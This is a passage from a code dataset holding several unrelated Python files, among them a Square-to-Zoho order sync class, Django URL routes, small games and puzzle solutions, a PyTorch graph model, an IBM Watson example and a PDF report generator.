'EDU'},\n }\n\n def get_square_data(self):\n self.api_instance = Client(access_token=self.zoho_token['SQUARE_KEY'])\n self.body = {\n 'location_ids': [self.vans[self.van]],\n 'query': {\n 'filter': {'date_time_filter': {'created_at': {\n 'start_at': dt.datetime.today().strftime('%Y-%m-%d'),\n 'end_at': (dt.datetime.today() + dt.timedelta(days=1)).strftime('%Y-%m-%d')\n }\n\n }\n }\n },\n 'return_entries': False,\n }\n self.api_response = self.api_instance.orders.search_orders(self.body)\n return json.loads(self.api_response.text)\n\n def remove_return_orders(self,lst, key):\n result = []\n for i, dic in enumerate(lst):\n try:\n if len(dic[key]) > 0:\n result.append(dic)\n except:\n pass #we can use this in the future to get the returns\n return result\n\n def validated_data(self, json_data):\n if len(json_data) != 0:\n dta_tenders = json_normalize(json_data,'tenders',['id'],meta_prefix = 'order_')\n dta_items = json_normalize(json_data,'line_items',['id'],meta_prefix = 'order_')\n data_full = dta_tenders.merge(dta_items,how = 'left',on = ['order_id'])\n data_full = data_full.fillna(0)\n data_full['quantity'] = data_full['quantity'].astype(int)\n return data_full\n return 0\n\n def merge_data(self, df):\n df = df.merge(self.square_df, 
how='left', left_on='catalog_object_id', right_on='token')\n df.loc[df['catalog_object_id']==0,'item_id'] = '1729377000002073265'\n df.loc[df['catalog_object_id']==0,'qt'] = 1\n df.loc[df['catalog_object_id']==0,'cat'] = 'ZZZ'\n df['item_id'].fillna(0, inplace=True)\n df['qty'] = df['quantity'] * df['qt']\n df['item_total'] = df['gross_sales_money.amount'] / (107 * df['qty'])\n df['discount'] = df['total_discount_money.amount'] / 107\n df['money'] = df['total_money.amount'] / 107\n df['cat2'] = np.where(df['cat']=='ZZZ',1,0)\n df['subtotal'] = df['item_total'] * df['qty']\n df['payment'] = np.where(df['processing_fee_money.amount'] > 0, 'CARD', 'CASH')\n df['created_at'] = df['created_at'].apply(lambda x: parser.parse(str(x)).strftime('%Y-%m-%d'))\n\n v1 = df.loc[df['item_id']==0]['catalog_object_id'].to_list()\n\n return df, v1\n\n def create_dfs(self, df):\n\n try:\n df1 = df.drop_duplicates(subset=['transaction_id','catalog_object_id','gross_sales_money.amount','note'])\n except:\n df1 = df.drop_duplicates(subset=['transaction_id','catalog_object_id','gross_sales_money.amount'])\n\n df2 = df1.groupby(['created_at', 'location_id', 'cat', 'item_id'], as_index=False).agg({\n 'subtotal': sum,\n 'discount': sum,\n 'qty': sum})\n\n df2['price'] = df2['subtotal'] / df2['qty']\n\n df3 = df.groupby(['payment','cat2'], as_index=False).agg({'money': sum})\n df3.cat2 = df3.cat2.astype(str)\n df3.money = df3.money * 1.07\n\n return df1, df2, df3\n\n def payment_const(self):\n try:\n cashp = '$' + str(df3.loc[(df3.payment=='CASH') & (df3.cat2=='1')].money.values[0]) + ' pending'\n except:\n cashp = 'Full Amount'\n\n try:\n ccp = '$' + str(df3.loc[(df3['payment']=='CARD') & (df3['cat2']=='1')].money.values[0]) + ' pending'\n except:\n ccp = 'Full Amount'\n\n try:\n cash0 = df3.loc[(df3.payment=='CASH') & (df3.cat2=='0')].money.values[0]\n except:\n cash0 = 0\n\n try:\n cc0 = df3.loc[(df3.payment=='CARD') & (df3.cat2=='0')].money.values[0]\n except:\n cc0 = 0\n return cashp, ccp, cash0, cc0\n\n def create_so(self, zoho, df):\n line_items = []\n\n for i in range(len(df)):\n line = {\n 'item_id': int(df.item_id[i]),\n 'rate': df.price[i],\n 'discount': df.discount[i],\n 'discount_type': 'item_level',\n 'quantity': int(df.qty[i]),\n 'warehouse_id': self.van_id[df.location_id[i]]['whid'],\n }\n line_items.append(line)\n\n so = parser.parse(df.created_at[0]).strftime('%y%m%d')\n\n data = {\n 'customer_id': int(self.van_id[df.location_id[0]]['cxid']),\n 'salesorder_number': self.van_id[df.location_id[0]]['pfix'] + '-' + so,\n 'date': parser.parse(df.created_at[len(df)-1]).strftime('%Y-%m-%d'),\n 'line_items': line_items,\n 'custom_fields': [{'customfield_id': '1729377000039969865', 'value':'Square'}],\n }\n\n return zoho.create_order(data)\n\n def create_package(self, zoho, r):\n pk_items = []\n for i in range(len(r['salesorder']['line_items'])):\n if r['salesorder']['line_items'][i]['item_id'] != '1729377000002073265':\n pk_line = {'so_line_item_id': r['salesorder']['line_items'][i]['line_item_id'],\n 'quantity': r['salesorder']['line_items'][i]['quantity']\n }\n pk_items.append(pk_line)\n\n pk_data = {\n 'date': r['salesorder']['date'],\n 'line_items': pk_items,\n }\n return zoho.create_package(r['salesorder']['salesorder_id'], pk_data)\n\n def shipment(self, zoho, r):\n shdata = {\n 'shipment_number': r['package']['salesorder_number'],\n 'date': r['package']['salesorder_date'],\n 'delivery_method': 'Van',\n 'tracking_number': '',\n }\n return zoho.create_shipment(r['package']['package_id'], 
r['package']['salesorder_id'], shdata, True)\n\n def delivered(self, zoho, r):\n return zoho.delivered(r['shipmentorder']['shipment_id'])\n\n def rounding(self, zoho, r, df):\n so = parser.parse(df.created_at[0]).strftime('%y%m%d')\n data = {\n 'customer_id': int(self.van_id[df.location_id[0]]['cxid']),\n 'salesorder_number': self.van_id[df.location_id[0]]['pfix'] + '-' + so,\n 'date': parser.parse(df.created_at[len(df)-1]).strftime('%Y-%m-%d'),\n 'adjustment': round(r['salesorder']['total'],0)-r['salesorder']['total'],\n 'adjustment_description': 'Rounding'\n }\n return zoho.update_order(r['salesorder']['salesorder_id'], data)\n\n def create_invoice(self, zoho, r, df):\n inv_items = []\n for i in range(len(r['salesorder']['line_items'])):\n if r['salesorder']['line_items'][i]['item_id'] != '1729377000002073265':\n inv_line = {'salesorder_item_id': r['salesorder']['line_items'][i]['line_item_id'],\n 'item_id': r['salesorder']['line_items'][i]['item_id'],\n 'quantity': r['salesorder']['line_items'][i]['quantity'],\n 'discount': r['salesorder']['line_items'][i]['discount'],\n 'discount_type': 'item_level',\n 'warehouse_id': self.van_id[df.location_id[0]]['whid'],\n 'rate': r['salesorder']['line_items'][i]['rate'],\n }\n inv_items.append(inv_line)\n inv_data = {\n 'customer_id': r['salesorder']['customer_id'],\n 'date': r['salesorder']['date'],\n 'line_items': inv_items,\n 'adjustment': r['salesorder']['adjustment'],\n 'adjustment_description': r['salesorder']['adjustment_description'],\n }\n return zoho.create_invoice(inv_data)\n\n def create_payment(self, zoho, r, invoice_id, cash0, cashp, cc0, ccp):\n pay_data = [{\n 'customer_id': r['salesorder']['customer_id'],\n 'payment_mode': 'Cash',\n 'amount': cash0,\n 'date': r['salesorder']['date'],\n 'reference_number': cashp,\n 'invoices': [{\n 'invoice_id': invoice_id,\n 'amount_applied': cash0,\n }],\n 'account_id': 1729377000028708216,\n },\n {\n 'customer_id': r1['salesorder']['customer_id'],\n 'payment_mode': 'Credit Card',\n 'amount': cc0,\n 'date': r1['salesorder']['date'],\n 'reference_number': ccp,\n 'invoices': [{\n 'invoice_id': invoice_id,\n 'amount_applied': cc0,\n }],\n 'account_id': 1729377000028708190,\n }]\n\n if cash0 * cc0 == 0:\n if cash == 0:\n return zoho.create_cxpayment(pay_data[1])\n return zoho.create_cxpayment(pay_data[0])\n for i in range(2):\n res = zoho.create_cxpayment(pay_data[i])\n return res\n\n def transfer_order(self, zoho, r, df):\n so = parser.parse(df.created_at[0]).strftime('%y%m%d')\n transfer_items = []\n\n for i in range(len(r['salesorder']['line_items'])):\n tf_items = {\n 'item_id': r['salesorder']['line_items'][i]['item_id'],\n 'name': r['salesorder']['line_items'][i]['name'],\n 'description': r['salesorder']['line_items'][i]['description'],\n 'quantity_transfer': r['salesorder']['line_items'][i]['quantity'],\n }\n transfer_items.append(tf_items)\n\n transfer_data = {\n 'transfer_order_number': self.van_id[df.location_id[0]]['pfix'] + '-' + so,\n 'date': r['salesorder']['date'],\n 'from_warehouse_id': self.van_id[df.location_id[0]]['pwh'],\n 'to_warehouse_id': self.van_id[df.location_id[0]]['whid'],\n 'line_items': transfer_items,\n 'is_intransit_order': True,\n }\n\n return zoho.transfer_order(transfer_data)\n","repo_name":"jesfel/web_tab_test","sub_path":"square2.py","file_name":"square2.py","file_ext":"py","file_size_in_byte":11126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1949304779","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index), #landing page\n path('register', views.register), #registration page\n path('process_registration', views.process_registration), #processes registration form\n path('login', views.login), #login page\n path('process_login', views.process_login), #processes login form\n path('logout', views.logout),\n path('shows/', views.shows), #homepage - lists shows\n path('shows/new', views.shows_new), #form to add a new show\n path('shows/create', views.shows_create), #processes add show, leads to show info\n path('shows/', views.show_info), #path for show's info\n path('add_favorite/', views.add_favorite), #processes favorite(like button)\n path('unfavorite/', views.unfavorite),\n path('process_review/', views.process_review), #processes review form\n path('delete_review//', views.delete_review),\n path('favorite_shows', views.favorite_shows),\n path('shows//edit', views.show_edit), #form to edit show\n path('shows//update', views.show_update), #processes edit show, leads to show info\n path('shows//destroy', views.destroy), #deletes show\n]\n","repo_name":"francesbathan/tv-show-portal","sub_path":"app_shows/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22743913995","text":"import random\nfrom words import word_list\nchosen_word =random.choice(word_list)\n\ndisplay = []\nword_length = len(chosen_word)\nlives = 6\n\nfor letter in range(word_length) :\n display+=\"_\"\nprint(display)\nend_of_game = False\nwhile not end_of_game :\n guess = input(\"Guess a letter\").lower()\n for position in range(word_length):\n letter = chosen_word[position]\n if letter == guess :\n display[position]=letter\n\n print(display)\n if \"_\" not in display :\n end_of_game = True\n print(\"You win\")\n if guess not in chosen_word :\n lives -=1\n if lives == 0 :\n end_of_game = True\n print(\"You Lose\")\n\nprint(f\"answer is {chosen_word}\")","repo_name":"Om334exe/PythonBasicProjects","sub_path":"WordGuessingGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71545102593","text":"#loads files with name 'filename' from start to end\nimport cPickle as pickle\nimport numpy as np\n#from numba import jit\n#\n#@jit(nopython=True)\ndef load_quantity(filename,start,end):\n with open('/Users/iCade/Desktop/CAM/PartIII/PROJECT/python/input/'+filename+'/'+filename+'_0%i' %start, 'rb') as fileObject:\n A = pickle.load(fileObject)[np.newaxis]\n \n \n for j in range(start+1,end+1):\n with open('/Users/iCade/Desktop/CAM/PartIII/PROJECT/python/input/'+filename+'/'+filename+'_0%i' %j, 'rb') as fileObject:\n B = pickle.load(fileObject)\n \n A = np.concatenate((A,B[np.newaxis]),axis=0)\n \n return np.transpose(A,axes=(1,2,0))","repo_name":"harry-rendell/accretion_disk","sub_path":"funcs/load_quantity.py","file_name":"load_quantity.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16049265205","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport sys\n\n# model\nclass nconv(nn.Module):\n def __init__(self):\n super(nconv,self).__init__()\n\n def forward(self,x, A):\n x = torch.einsum('ncvl,vw->ncwl',(x,A))\n return x.contiguous()\n\nclass 
Aconv(nn.Module):\n def __init__(self):\n super(Aconv,self).__init__()\n\n def forward(self,x, A, shift):\n Align_x = torch.roll(x, shift, dims=2) \n out = torch.zeros_like(x).to(x.device)\n Align_x[...,:shift,:] = out[...,:shift,:] \n x = torch.einsum('ncvl,vw->ncwl',(Align_x,A))\n return x.contiguous()\n\nclass linear(nn.Module):\n def __init__(self,c_in,c_out):\n super(linear,self).__init__()\n self.mlp = torch.nn.Conv2d(c_in, c_out, kernel_size=(1, 1), padding=(0,0), stride=(1,1), bias=True)\n\n def forward(self,x):\n return self.mlp(x)\n\nclass emb_trans(nn.Module):\n def __init__(self, device, n_dim=10):\n super(emb_trans, self).__init__()\n self.w = nn.Parameter(torch.eye(n_dim).to(device), requires_grad=True).to(device)\n self.b = nn.Parameter(torch.zeros(n_dim).to(device), requires_grad=True).to(device)\n def forward(self, nodevec1, nodevec2, n):\n nodevec1 = nodevec1.mm(self.w) + self.b.repeat(n, 1)\n nodevec2 = (nodevec2.T.mm(self.w) + self.b.repeat(n, 1)).T\n return nodevec1, nodevec2\n\nclass Agcn(nn.Module):\n def __init__(self,c_in,c_out,dropout, kernel_size, dilation, device, e_dim=10):\n super(Agcn,self).__init__()\n self.Aconv = Aconv()\n c_in = (1+kernel_size)*c_in\n self.mlp = linear(c_in,c_out)\n self.dropout = dropout\n self.kernel_size = kernel_size\n self.dilation = dilation\n self.e_trans = nn.ModuleList()\n\n for i in range(kernel_size-1):\n self.e_trans.append(emb_trans(device, e_dim))\n\n def forward(self,x, nodevec1, nodevec2):\n out = [x]\n shift = 0\n n = nodevec1.size(0)\n \n adp = F.softmax(F.relu(torch.mm(nodevec1, nodevec2)), dim=1)\n x1 = self.Aconv(x, adp, shift)\n out.append(x1) \n shift = self.dilation\n x2 = x1 \n for i in range(self.kernel_size-1):\n nodevec1, nodevec2 = self.e_trans[i](nodevec1, nodevec2, n)\n adp = F.softmax(F.relu(torch.mm(nodevec1, nodevec2)), dim=1)\n x1 = self.Aconv(x2, adp, shift)\n out.append(x1)\n shift = shift + self.dilation\n x2 = x1 \n h = torch.cat(out,dim=1)\n h = self.mlp(h)\n h = F.dropout(h, self.dropout, training=self.training)\n return h\n\nclass Anet(nn.Module):\n def __init__(self, device, num_nodes, dropout=0.3, aptinit=None, in_dim=2,out_dim=12,\n residual_channels=32,dilation_channels=32,skip_channels=256,end_channels=512,kernel_size=2,blocks=4,layers=2, e_dim=10, kernel_size_Agcn=2):\n super(Anet, self).__init__()\n self.dropout = dropout\n self.blocks = blocks\n self.layers = layers\n\n self.align = nn.ModuleList()\n self.filter_convs = nn.ModuleList()\n self.gate_convs = nn.ModuleList()\n self.residual_convs = nn.ModuleList()\n self.skip_convs = nn.ModuleList()\n self.bn = nn.ModuleList()\n self.gconv = nn.ModuleList()\n self.e_trans = nn.ModuleList()\n\n self.start_conv = nn.Conv2d(in_channels=in_dim,\n out_channels=residual_channels,\n kernel_size=(1,1))\n \n receptive_field = 1\n if aptinit is None:\n self.nodevec1 = nn.Parameter(torch.randn(num_nodes, e_dim).to(device), requires_grad=True).to(device)\n self.nodevec2 = nn.Parameter(torch.randn(e_dim, num_nodes).to(device), requires_grad=True).to(device)\n else:\n m, p, n = torch.svd(aptinit)\n initemb1 = torch.mm(m[:, :e_dim], torch.diag(p[:e_dim] ** 0.5))\n initemb2 = torch.mm(torch.diag(p[:e_dim] ** 0.5), n[:, :e_dim].t())\n self.nodevec1 = nn.Parameter(initemb1, requires_grad=True).to(device)\n self.nodevec2 = nn.Parameter(initemb2, requires_grad=True).to(device)\n\n for b in range(blocks):\n additional_scope = kernel_size - 1\n new_dilation = 1\n for i in range(layers):\n # dilated convolutions\n 
self.filter_convs.append(nn.Conv2d(in_channels=residual_channels,\n                                                   out_channels=dilation_channels,\n                                                   kernel_size=(1,kernel_size),dilation=new_dilation))\n\n                self.gate_convs.append(nn.Conv1d(in_channels=residual_channels,\n                                                 out_channels=dilation_channels,\n                                                 kernel_size=(1, kernel_size), dilation=new_dilation))\n\n                # 1x1 convolution for residual connection\n                self.residual_convs.append(nn.Conv1d(in_channels=dilation_channels,\n                                                     out_channels=residual_channels,\n                                                     kernel_size=(1, 1)))\n\n                # 1x1 convolution for skip connection\n                self.skip_convs.append(nn.Conv1d(in_channels=dilation_channels,\n                                                 out_channels=skip_channels,\n                                                 kernel_size=(1, 1)))\n                self.bn.append(nn.BatchNorm2d(residual_channels))\n                self.gconv.append(Agcn(residual_channels, dilation_channels, dropout, kernel_size_Agcn, new_dilation,device, e_dim = e_dim))\n                self.e_trans.append(emb_trans(device, e_dim))\n                \n                new_dilation *=2\n                receptive_field += additional_scope\n                additional_scope *= 2\n            \n\n        self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,\n                                  out_channels=end_channels,\n                                  kernel_size=(1,1),\n                                  bias=True)\n\n        self.end_conv_2 = nn.Conv2d(in_channels=end_channels,\n                                    out_channels=out_dim,\n                                    kernel_size=(1,1),\n                                    bias=True)\n\n        self.receptive_field = receptive_field\n\n\n\n    def forward(self, input):\n        in_len = input.size(3)\n        if in_len < self.receptive_field:\n            x = nn.functional.pad(input, (self.receptive_field - in_len, 0, 0, 0))\n        else:\n            x = input\n        x = self.start_conv(x)\n        skip = 0\n        n1, n2 = self.nodevec1, self.nodevec2\n        n = n1.size(0)\n        for i in range(self.blocks * self.layers):\n            residual = x\n            # gated dilated convolution\n            filter = torch.tanh(self.filter_convs[i](residual))\n            gate = torch.sigmoid(self.gate_convs[i](residual))\n            x = filter * gate\n            ss = x\n            # graph convolution with evolving node embeddings\n            x2 = self.gconv[i](residual, n1, n2) # residual_channels -> dilation_channels\n            n1, n2 = self.e_trans[i](n1, n2, n)\n            ss = ss + x2[:, :, :, -x.size(3):] \n            # parametrized skip connection\n            \n            s = self.skip_convs[i](ss) # skip_channels\n            try:\n                skip = skip[:, :, :, -s.size(3):]\n            except:\n                skip = 0\n            skip = s + skip\n\n            x = self.residual_convs[i](ss)\n            x = x + residual[:, :, :, -x.size(3):]\n            x = self.bn[i](x)\n\n        x = F.relu(skip)\n        x = F.relu(self.end_conv_1(x))\n        x = self.end_conv_2(x)\n        return x\n","repo_name":"chenxino/DTMP","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3538669689","text":"import json\nfrom ibm_watson import NaturalLanguageUnderstandingV1\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom ibm_watson.natural_language_understanding_v1 \\\n    import Features, EmotionOptions, ConceptsOptions, CategoriesOptions, EntitiesOptions, KeywordsOptions\n    \n# Enter the API key obtained when the service was created\nauthenticator = IAMAuthenticator('MY_KEY')\nnatural_language_understanding = NaturalLanguageUnderstandingV1(\n    version='2020-08-01', # see the API docs\n    authenticator=authenticator\n)\n\n\n# Enter the URL obtained when the service was created\nnatural_language_understanding.set_service_url('https://api.kr-seo.natural-language-understanding.watson.cloud.ibm.com/instances/e9d7070c-b625-475a-b47c-7df4003b71f6')\n\n\n# See the IBM Cloud API documentation\n\n# Categories example\n# response = natural_language_understanding.analyze(\n#     url='www.ibm.com',\n#     features=Features(categories=CategoriesOptions(limit=3))\n# ).get_result()\n\n# print(json.dumps(response, indent=2))\n\n# Concept analysis example\n# response = natural_language_understanding.analyze(\n#     url='www.ibm.com',\n#     features=Features(concepts=ConceptsOptions(limit=3))).get_result()\n\n# print(json.dumps(response, indent=2))\n\n\n# Emotion analysis example\n# Analyze the emotion of targets in the content\n# response = natural_language_understanding.analyze(\n#     html=\"<html><head><title>Fruits</title></head><body><h1>Apples and Oranges</h1><p>I love apples! I don't like oranges.</p></body></html>\",\n#     features=Features(emotion=EmotionOptions(targets=['apples','oranges']))).get_result()\n\n# print(json.dumps(response, indent=2))\n\n# Entity analysis example\n# Detect entities such as people, cities, and organizations in the content\n# response = natural_language_understanding.analyze(\n#     url='www.cnn.com',\n#     features=Features(entities=EntitiesOptions(sentiment=True,limit=1))).get_result()\n\n# print(json.dumps(response, indent=2))\n\n\n# Keyword analysis example\n# Extract the important keywords from the content\nresponse = natural_language_understanding.analyze(\n    url='www.ibm.com',\n    features=Features(keywords=KeywordsOptions(sentiment=True,emotion=True,limit=2))).get_result()\n\nprint(json.dumps(response, indent=2))\n","repo_name":"bae0053/IBM_Test","sub_path":"Natural_Language_Understanding/Authentication.py","file_name":"Authentication.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9231774870","text":"import pyautogui as p\nimport time as t\n# n = start date\nn=1\np.hotkey('alt', 'tab')\n\nwhile n <= 21:\n    p.hotkey('ctrl', 's')\n    t.sleep(1)\n    p.press('enter')\n    t.sleep(1)\n    p.hotkey('ctrl', 'pgdn')\n    t.sleep(1)\n    n = n+1\n","repo_name":"irpannawawi/wdio-dds","sub_path":"auto_save_dds.py","file_name":"auto_save_dds.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23399808621","text":"def check(N,r,t):\n    return (2*r+1+2*(N-1))*N<=t\n\ndef solve(r,t):\n    ## use iteration algorithm\n    n = 0\n    while check(2**n,r,t):\n        n += 1\n    n -= 1\n    if n==-1:\n        return 0\n    N = 0\n    for i in range(n+1):\n        if check(N+2**(n-i),r,t):\n            N += 2**(n-i)\n    return N\n    \n    \n## \n## MAIN PROGRAM\n##\nT = int(input())\nfor n in range(T):\n    ## read case\n    r,t = map(int, input().rstrip().split())\n    \n    ## solve and print result\n    result = solve(r,t)\n    print('Case #'+str(n+1)+': '+str(result))\n\n\n    \n    \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_120/196.py","file_name":"196.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"387100722","text":"# Breaking eggs with eggs\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\neggs = [0]*n\ndamages = [0]*n\n\nfor i in range(n):\n    eggs[i], damages[i] = map(int, input().split())\n\nans = 0 \n\ndef bomb(idx, eggs):\n    global ans\n    if idx == n:\n        cnt = 0\n        for i in range(n):\n            if eggs[i] <= 0:\n                cnt +=1\n        if cnt > ans:\n            ans = cnt\n        return\n\n    if eggs[idx] > 0:\n        check = False\n        for i in range(n):\n            if eggs[i] > 0 and i != idx:\n                check = True\n                tmp = eggs[:]\n                tmp[i] -= damages[idx]\n                tmp[idx] -= damages[i]\n                bomb(idx+1, tmp)\n        if not check:\n            bomb(idx+1, eggs)\n    else:\n        bomb(idx+1, eggs)\n\nbomb(0, eggs)\nprint(ans)","repo_name":"SIGMAOON/Brute_Force","sub_path":"16987.py","file_name":"16987.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19812572508","text":"from tkinter import font\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\nimport DataBase.DataBase as db\nfrom Funcoes.genericas import caminho_db\n\nfrom Relatorios.pdf_branco import Pdf\n \n \nclass RelatorioGeral(Pdf):\n\n    def __init__(self, nome_arquivo, datas):\n        super().__init__(nome_arquivo)\n\n        self.y = 740\n        self.datas = datas\n        self.db = db.DataBase(caminho_db())\n        self.consultar_dados()\n        self.gerar()\n\n    def 
consultar_dados(self):\n self.dados = {\n 'titulo':'GERAL',\n 'data_ini':self.datas[0],\n 'data_fim':self.datas[1],\n 'pagamentos':{\n },\n 'tanque':{\n 1:{'titulo':'GASOLINA INICIAL', 'valor': 0},\n 2:{'titulo':'GASOLINA ATUAL', 'valor': 0},\n },\n 'entradas_tanque':{\n },\n 'entradas_tanque_total':0,\n 'vendas':{\n 1:{'titulo':'LITROS VENDIDOS', 'valor': 0},\n 2:{'titulo':'DINHEIRO', 'valor': 0},\n 3:{'titulo':'CARTÃO', 'valor': 0},\n 4:{'titulo':'PIX', 'valor': 0},\n 5:{'titulo':'TOTAL', 'valor': 0}\n },\n 'entrada_total':0,\n 'entradas':{\n },\n 'saldo':0,\n }\n\n self.dados_tanque()\n self.dados_vendas()\n self.dados_pagamentos()\n self.dados_entradas()\n self.dados_tanque_entrada()\n\n\n \n def dados_tanque(self):\n dados = self.db.select_generico(\"SELECT quantidade FROM Valor_combustivel WHERE codigo=1\")\n vendas = self.db.select_generico(f\"SELECT litros FROM Caixa WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n entrada = self.db.select_generico(f\"SELECT data, combustivel, quantidade, valor_nota FROM entrada_combustivel WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n tanque = self.dados['tanque']\n total = 0\n for i in vendas:\n total+= i[0]\n for i in entrada:\n total-= i[2]\n\n\n tanque[1]['valor'] = self.litro(total + dados[0][0])\n tanque[2]['valor'] = self.litro(dados[0][0])\n\n\n def dados_tanque_entrada(self):\n entrada = self.db.select_generico(f\"SELECT data_compra, data, id, quantidade, valor_nota FROM entrada_combustivel WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n entrada_tanque = self.dados['entradas_tanque']\n total = 0\n\n for j, i in enumerate(entrada):\n entrada_tanque[j] = {}\n entrada_tanque[j]['data_compra'] = i[0]\n entrada_tanque[j]['data'] = i[1]\n entrada_tanque[j]['nota'] = i[2]\n entrada_tanque[j]['quantidade'] = self.litro(i[3])\n entrada_tanque[j]['valor_nota'] = self.dinheiro(i[4])\n total += i[3]\n\n self.dados['entradas_tanque_total'] = self.litro(total)\n\n def dados_entradas(self):\n dados = self.db.select_generico(f\"SELECT data, nome, descricao, valor FROM Entrada WHERE data BETWEEN '{self.datas[0]}' AND '{self.datas[1]}'\")\n entrada = self.dados['entradas']\n total = 0\n for i, j in enumerate(dados):\n entrada[i] = {}\n entrada[i]['data'] = j[0]\n entrada[i]['nome'] = j[1]\n entrada[i]['descrição'] = j[2]\n entrada[i]['valor'] = self.dinheiro(j[3])\n total+= j[3]\n \n self.dados['saldo'] = self.dados['saldo'] + total\n self.dados['entrada_total'] = self.dinheiro(total)\n\n def dados_pagamentos(self):\n tipos = self.db.select_generico(\"SELECT DISTINCT tipo FROM Despesas WHERE status ='Pago' AND data BETWEEN '{}' AND '{}'\".format(self.datas[0],self.datas[1]))\n dados = self.db.select_generico(\"SELECT tipo, valor FROM Despesas WHERE status ='Pago' AND data BETWEEN '{}' AND '{}'\".format(self.datas[0],self.datas[1]))\n pagamentos = self.dados['pagamentos']\n for j in tipos:\n pagamentos[j[0]] = {'titulo': j[0], 'valor': 0}\n for i in dados:\n pagamentos[i[0]]['valor'] += i[1]\n\n total = {'titulo': 'TOTAL', 'valor': 0}\n for i in pagamentos.values():\n total['valor'] += i['valor']\n\n pagamentos['TOTAL'] = total\n saldo = self.dados['saldo']\n self.dados['saldo'] = saldo - total['valor']\n \n for i in pagamentos.values():\n i['valor'] = self.dinheiro(i['valor'])\n\n def dados_vendas(self):\n dados = self.db.select_generico(\"SELECT litros, dinheiro_caixa, cartao, pix, total FROM Caixa WHERE data BETWEEN '{}' AND '{}'\".format(self.datas[0],self.datas[1]))\n vendas = self.dados['vendas']\n for 
i in dados:\n vendas[1]['valor'] += i[0]\n vendas[2]['valor'] += i[1]\n vendas[3]['valor'] += i[2]\n vendas[4]['valor'] += i[3]\n vendas[5]['valor'] += i[4]\n\n self.dados['saldo'] = self.dados['saldo'] + vendas[5]['valor']\n vendas[1]['valor'] = self.litro(vendas[1]['valor'])\n vendas[2]['valor'] = self.dinheiro(vendas[2]['valor'])\n vendas[3]['valor'] = self.dinheiro(vendas[3]['valor'])\n vendas[4]['valor'] = self.dinheiro(vendas[4]['valor'])\n vendas[5]['valor'] = self.dinheiro(vendas[5]['valor'])\n\n def gerar(self):\n self.can = canvas.Canvas(self.packet)\n self.preencher_cabecalho()\n self.vendas()\n self.tanque()\n self.tanque_entrada()\n self.entradas()\n self.pagamentos()\n self.saldo()\n\n self.can.save()\n self.gerar_relatorio_mensal()\n\n \n def preencher_cabecalho(self):\n self.font(26)\n self.can.drawRightString(320, 790, f\"RELATÓRIO {self.dados['titulo']}\")\n self.font(10)\n self.can.drawRightString(570, 790, f\"Periodo: {self.dados['data_ini']} à {self.dados['data_fim']}\")\n\n def vendas(self):\n self.titulo('VENDAS', font=12, y=0)\n for i in self.dados['vendas'].values():\n self.campo(i['titulo'], i['valor'], font=10)\n self.mudarY(-30)\n\n def tanque(self):\n self.titulo('TANQUE', font=12, y=0)\n for i in self.dados['tanque'].values():\n self.campo(i['titulo'], i['valor'], font=10)\n self.mudarY(-20)\n\n def tanque_entrada(self):\n self.titulo('ENTRADAS COMBUSTIVEL',x=70, font=11)\n if self.dados['entradas_tanque'] != {}:\n self.linhas_tabela_tanque(['COMPRA', 'RECEBIMENTO', 'Nº NOTA', 'QUANTIDADE', 'VALOR',], font=10)\n for i in self.dados['entradas_tanque'].values():\n self.linhas_tabela_tanque([i['data_compra'],i['data'], i['nota'], i['quantidade'], i['valor_nota']],y=-15, font=10)\n self.total_tabela_tanque(self.dados['entradas_tanque_total'], font=10)\n self.mudarY(-30)\n\n def entradas(self):\n self.titulo('ENTRADA CAPITAL', font=12, y=0)\n if self.dados['entradas'] != {}:\n self.linhas_tabela(['DATA', 'RESPONSAVEL', 'DESCRIÇÃO', 'VALOR'], font=10)\n for i in self.dados['entradas'].values():\n self.linhas_tabela([i['data'], i['nome'], i['descrição'], i['valor']], font=10)\n self.total_tabela(self.dados['entrada_total'], font=10)\n self.mudarY(-30)\n\n def pagamentos(self):\n self.titulo('PAGAMENTOS', font=12, y=0)\n for i in self.dados['pagamentos'].values():\n self.campo(i['titulo'], i['valor'], font=10)\n self.mudarY(-30)\n\n def saldo(self):\n self.campo_saldo(self.dinheiro(self.dados['saldo']), font=10)\n\n","repo_name":"GsFerreira99/Sistema-Posto","sub_path":"Relatorios/cabecalho.py","file_name":"cabecalho.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40233252968","text":"# coding=utf-8\n\n\nfrom pants.backend.jvm.targets.exclude import Exclude\nfrom pants.backend.jvm.targets.jar_dependency import JarDependency\nfrom 